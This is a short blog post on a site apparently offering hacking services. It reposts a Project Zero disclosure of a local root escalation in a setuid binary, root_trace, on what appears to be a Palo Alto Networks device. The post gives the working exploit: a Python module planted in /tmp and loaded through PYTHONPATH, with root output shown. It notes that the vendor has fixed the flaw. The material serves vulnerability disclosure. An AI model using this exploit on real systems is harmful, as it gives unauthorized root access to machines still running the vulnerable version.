Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86396737

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=912

The setuid root executable /usr/local/bin/root_trace essentially just does setuid(0) then system("/usr/local/bin/masterd"), which is a python script:

$ ls -l /usr/local/bin/root_trace 
-rwsr-xr-x 1 root root 12376 Oct 17  2014 /usr/local/bin/root_trace

As the environment is not scrubbed, you can just do something like this:

$ cat /tmp/sysd.py
import os
os.system("id")
os._exit(0);

$ PYTHONPATH=/tmp root_trace
uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)

This was fixed by PAN:

http://securityadvisories.paloaltonetworks.com/Home/Detail/67